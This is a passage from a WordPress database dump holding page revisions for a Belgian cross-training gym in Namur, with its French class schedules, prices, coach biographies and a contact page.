cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:38:42', '2013-07-04 19:38:42', '', 11, 'http://www.crosstrainingcenter.be/11-revision-106/', 0, 'revision', '', 0),
(320, 1, '2013-07-04 19:39:35', '2013-07-04 19:39:35', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Chaque séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:39:35', '2013-07-04 19:39:35', '', 11, 'http://www.crosstrainingcenter.be/11-revision-107/', 0, 'revision', '', 0),
(322, 1, '2013-07-10 15:44:11', '2013-07-10 15:44:11', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:44:11', '2013-07-10 15:44:11', '', 11, 'http://www.crosstrainingcenter.be/11-revision-109/', 0, 'revision', '', 0),
(323, 1, '2013-07-10 15:45:00', '2013-07-10 15:45:00', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:45:00', '2013-07-10 15:45:00', '', 11, 'http://www.crosstrainingcenter.be/11-revision-110/', 0, 'revision', '', 0),
(324, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-35', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 20, 'http://www.crosstrainingcenter.be/20-revision-35/', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(325, 1, '2013-07-04 18:19:44', '2013-07-04 18:19:44', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de \r\nTeam Training, Duo Training, Personnal \r\nTrainer ou Coatching nutritionnel se \r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:44', '2013-07-04 18:19:44', '', 9, 'http://www.crosstrainingcenter.be/9-revision-18/', 0, 'revision', '', 0),
(326, 1, '2013-07-04 16:32:39', '2013-07-04 16:32:39', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement 